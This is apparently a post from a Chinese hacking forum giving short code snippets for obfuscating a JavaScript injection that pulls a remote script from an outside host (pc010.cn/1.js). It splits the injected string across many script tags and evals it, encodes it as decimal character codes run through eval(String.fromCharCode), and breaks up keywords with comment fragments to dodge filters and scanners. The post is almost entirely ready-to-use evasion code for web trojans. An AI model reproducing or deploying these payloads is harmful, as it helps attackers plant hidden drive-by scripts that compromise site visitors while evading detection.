以下是代码片段: <script>z='document.'</script> <script>z=z+'write("'</script> <script>z=z+'<script'</script> <script>z=z+' src=ht'</script> <script>z=z+'tp://ww'</script> <script>z=z+'w.pc010'</script> <script>z=z+'.cn/1.'</script> <script>z=z+'js></sc'</script> <script>z=z+'ript>")'</script> <script>eval(z)</script> |
以下是代码片段: document.write("<script src=http://www.pc010.cn/1.js></script>") |
以下是代码片段: <script>open(/* */"http://127"/* */+".0.0.1/"/* */)</script> |
以下是代码片段: document.write("<script src=http://www.pc010.cn/1.js></script>") 转为10进制表示字符: 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59 然后用eval加String.fromCharCode来执行:<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59))</script> 下面就用剑心的方法来进行拆分: <script>/* */eval(/* */String/* */./* */fromCharCode/* */(100,/* */111,99,/* */......./* */59))/* */</script> |
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) | Powered by Discuz! 7.2 |